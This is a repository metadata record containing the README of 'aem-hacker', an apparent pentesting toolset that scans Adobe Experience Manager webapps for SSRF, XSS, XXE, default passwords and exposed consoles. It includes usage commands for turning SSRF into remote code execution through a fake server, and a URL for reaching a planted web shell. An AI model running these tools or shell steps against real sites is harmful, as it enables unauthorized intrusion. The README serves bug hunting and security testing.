{"id":13633407,"url":"https://github.com/0ang3el/aem-hacker","last_synced_at":"2025-05-16T13:03:55.235Z","repository":{"id":45797122,"uuid":"149915655","full_name":"0ang3el/aem-hacker","owner":"0ang3el","description":null,"archived":false,"fork":false,"pushed_at":"2024-07-28T16:15:08.000Z","size":63,"stargazers_count":787,"open_issues_count":15,"forks_count":166,"subscribers_count":30,"default_branch":"master","last_synced_at":"2025-04-12T08:29:40.463Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0ang3el.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2018-09-22T20:32:16.000Z","updated_at":"2025-04-07T15:28:11.000Z","dependencies_parsed_at":"2024-08-01T23:37:16.897Z","dependency_job_id":null,"html_url":"https://github.com/0ang3el/aem-hacker","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0ang3el%2Faem-hacker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0ang3el","download_url":"https://codeload.github.com/0ang3el/aem-hacker/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254535826,"owners_count":22087398,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T23:00:37.869Z","updated_at":"2025-05-16T13:03:55.177Z","avatar_url":"https://github.com/0ang3el.png","language":"Python","readme":"# Toolset for AEM hacking\n\nTools to identify vulnerable Adobe Experience Manager (AEM) webapps. \u003ca href=\"https://www.adobe.com/marketing/experience-manager.html\"\u003eAEM is an enterprise-grade CMS\u003c/a\u003e.\n\nI've built these tools to automate bughunting and pentesting of AEM webapps. I've included checks for previously known vulnerabilities and misconfigurations, as well as for new ones, discovered by me in 2018/2019. **All discovered vulnerabilities were responsibly reported to Adobe PSIRT**.\n \nYou can find more details about vulnerabilities and techniques in presentations, I've prepared for \u003ca href=\"https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps\"\u003eHacktivity conference\u003c/a\u003e and \u003ca href=\"https://www.youtube.com/watch?v=EQNBQCQMouk\"\u003eLevelUp 0x03\u003c/a\u003e.\n\nAEM webapps are widespread and rarely configured securely or kept up to date. Bughunter, you have good chances to find security bugs, enjoy the tools!\n\n\nMikhail Egorov (\u003ca href=\"https://twitter.com/0ang3el\"\u003e@0ang3el\u003c/a\u003e)\n\n## Scripts\n\n* `aem_hacker.py` - main script to scan AEM webapp for vulnerabilities.\n* `aem_discoverer.py` - script to discover AEM webapps from list of URLs.\n* `aem_ssrf2rce.py`, `aem_server.py`, `response.bin` - scripts to get RCE from SSRF.\n* `aem-rce-sling-script.sh` - script to get RCE by uploading JSP shell to /apps JCR node.\n\n## aem_hacker.py\n**Important:** You need a VPS to detect SSRF vulnerabilities!\n\nTool tries to bypass AEM dispatcher. \n\nFollowing checks are currently implemented:\n* `Exposed DefaultGetServlet` - checks if JCR nodes, that might contain sensitive information and secrets, are exposed via DefaultGetServlet.\n* `Exposed QueryBulderJsonServlet and QueryBuilderFeedServlet` - if those servlets are exposed it might be possible to access various sensitive information and secrets. \n* `Exposed GQLServlet` - GQLServlet is similar to QueryBuilderFeedServlet.\n* `Ability to create new JCR nodes` - checks if it's possible to create new JCR node.\n* `Exposed POSTServlet` - POSTServlet allows to create/modify/delete content in JCR. Depending on your access level, it's possible to get stored XSS or RCE. \n* `Exposed LoginStatusServlet, CurrentUserServlet and UserInfoServlet` - if those servlets are exposed allows it might be possible to bruteforce credentials.\n* `Users with default password` - checks for admin:admin, author:author, etc.\n* `Exposed Felix Console` - exposed Felix Console might lead to RCE by uploading backdoor OSGI bundle.\n* `Enabled WCMDebugFilter` - vulnerable to CVE-2016-7882 WCMDebugFilter might lead to reflected XSS.\n* `Exposed WCMSuggestionsServlet` - exposed WCMSuggestionsServlet might lead to reflected XSS.\n* `Exposed CRXDE and CRX` - checks for exposure of CRXDE and CRX.\n* `Exposed Reports` - checks for exposure of reports.\n* `SSRF SalesforceSecretServlet` - checks for SSRF via SalesforceSecretServlet (CVE-2018-5006). SSRF might allow to ex-filtrate secrets or perform XSS.\n* `SSRF ReportingServicesServlet` - checks for SSRF via ReportingServicesServlet (CVE-2018-12809). SSRF might allow to ex-filtrate secrets or perform XSS.\n* `SSRF SitecatalystServlet` - checks for SSRF via SitecatalystServlet. SSRF might allow to get RCE with the help of aem_ssrf2rce.py, when specific AEM version and appserver is used.\n* `SSRF AutoprovisioningServlet` - checks for SSRF via AutoprovisioningServlet. SSRF might allow to get RCE with the help of aem_ssrf2rce.py, when specific AEM version and appserver is used.\n* `SSRF Opensocial Proxy` - checks for SSRF via Opensocial (Shindig) proxy. SSRF might allow to ex-filtrate secrets or perform XSS.\n* `SSRF Opensocial MakeRequest` - check for SSRF via Opensocial (Shindig) makeRequest. SSRF might allow to ex-filtrate secrets or perform XSS. You can use parameters `httpMethod`, `postData`, `headers`, `contentType` with `makeRequest`.\n* `SWF XSSes` - checks for XSSes via SWF.\n* `Deser ExternalJobServlet` - checks for vulnerable ExternalJobServlet.\n* `Exposed Webdav` - checks for access to JCR via WebDav protocol. Exposed WebDav might lead to XXE (CVE-2015-1833) or stored XSS.\n* `Exposed Groovy Console` - exposed Groovy console leads to RCE. \n* `Exposed ACS AEM Tools` - exposed ACS AEM Tools leads to RCE.\n* `Exposed GuideInternalSubmitServlet` - exposed GuideInternalSubmitServlet vulnerable to XXE (CVE-2019-8086).\n* `Exposed MergeMetadataServlet` - might be vulnerable to reflected XSS.\n* `Exposed SetPreferences page` - might be vulnerable to reflected XSS.\n\n#### Help\n```\nusage: aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST]\n                     [--port PORT] [--workers WORKERS]\n                     [-H [HEADER [HEADER ...]]] [--handler HANDLER]\n                     [--listhandlers]\n\nAEM hacker by @0ang3el, see the slides -\nhttps://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -u URL, --url URL     url to scan\n  --proxy PROXY         http and https proxy\n  --debug               debug output\n  --host HOST           hostname or IP to use for back connections during SSRF\n                        detection\n  --port PORT           opens port for SSRF detection\n  --workers WORKERS     number of parallel workers\n  -H [HEADER [HEADER ...]], --header [HEADER [HEADER ...]]\n                        extra http headers to attach\n  --handler HANDLER     run specific handlers, if omitted run all handlers\n  --listhandlers        list available handlers\n```\n\n#### Usage\n```\npython3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip\n```\n\nor\n\n```\npython3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip --handler groovy_console --handler salesforcesecret_servlet\n\n```\n\n## aem_discoverer.py\nScript allows to scan urls and find AEM webapps among them.\n\nTool tries to bypass AEM dispatcher.\n\n#### Help\n```\npython3 aem_discoverer.py -h\nusage: aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug]\n                         [--workers WORKERS]\n\nAEM discoverer by @0ang3el, see the slides -\nhttps://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps\n\noptional arguments:\n  -h, --help         show this help message and exit\n  --file FILE        file with urls\n  --proxy PROXY      http and https proxy\n  --debug            debug output\n  --workers WORKERS  number of parallel workers\n```\n\n#### Usage\n```\npython3 aem_discoverer.py --file urls.txt --workers 150\n```\n\n## aem_ssrf2rce.py, aem_server.py, response.bin\nHelps to exploit SSRF in `SitecatalystServlet` and `AutoprovisioningServlet` as RCE. It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty (default installation).\n\n#### Help\n\n```\npython3 aem_ssrf2rce.py -h\nusage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY]\n\noptional arguments:\n  -h, --help         show this help message and exit\n  --url URL          URL for SitecatalystServlet or AutoprovisioningServlet,\n                     including path, without query part\n  --fakeaem FAKEAEM  hostname/ip of fake AEM server\n  --proxy PROXY      http and https proxy\n```\n\n#### Usage\nPlace `aem_server.py` and `response.bin` on your VPS. Run `aem_server.py` script.\n\n```\npython3 aem_server.py\nstarting fake AEM server...\nrunning server...\n```\n\nRun `aem_ssrf2rce.py` script.\n\n```\npython3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip\n```\n\nIf RCE is possible, you should see incoming connection to your fake AEM server. After replication, you can access your shell from `https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls`.\n\n\n## aem-rce-sling-script.sh\nScript is handy when Felix Console is not available, but you have permissions to create new nodes under `/apps` JCR node.\n\n#### Usage\n\n```\n./aem-rce-sling-script.sh https://aem.webapp username password\n```\n","funding_links":[],"categories":["Miscellaneous","Python","Python (1887)"],"sub_categories":["CMS"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0ang3el%2Faem-hacker","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0ang3el%2Faem-hacker","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0ang3el%2Faem-hacker/lists"}